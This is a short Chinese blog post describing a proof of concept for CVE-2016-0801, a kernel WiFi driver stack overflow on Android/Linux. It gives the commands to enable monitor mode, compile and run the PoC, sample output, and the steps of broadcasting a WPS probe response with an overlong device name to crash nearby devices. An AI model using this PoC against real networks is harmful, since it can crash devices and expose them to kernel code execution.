AD

Android/Linux内核WiFi模块栈缓冲区溢出(CVE-2016-0801)POC

0x01概述

       Wi-Fi漏洞可通过发送恶意的无线控制信息包进行利用。该包可能会使内核内存崩溃,并使Android设备暴露于内核级别的远程代码执行风险之中。“当攻击者和受害者连接至相同的网络时,这些漏洞就可被触发。

0x02 POC


 使用方法

# airmon-ng start wlan0
# gcc -o wps wps.c -Wall -O2 -DDEBUG -DSHOW
# ./wps
Total Wps Length: 118
[99]  SSID: DON'T_CONNECT
         DEST: ff ff ff ff ff ff
         Sending Packet (315 byte) ...

c语言是对CVE-2016-0801问题的POC
POC的运行过程如下:
Ø  生成一个新的WPS探测相应数据包;
Ø  在这个数据包的device_name/设备名称字段,有几百个超长的字符;
Ø  使用WIFI网卡的监控模式,将这个数据包在所在WIFI网络中进行广播
Ø  WIFI网络中的设备接到到该数据包,通过MAC地址(DESTINATION_MAC)进行识别,造成设备崩溃。
       Wireshark中,可以找到一个探测数据包:wlan.fc.type_subtype == 0x05

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

多种方法绕过POWERSHELL的执行策略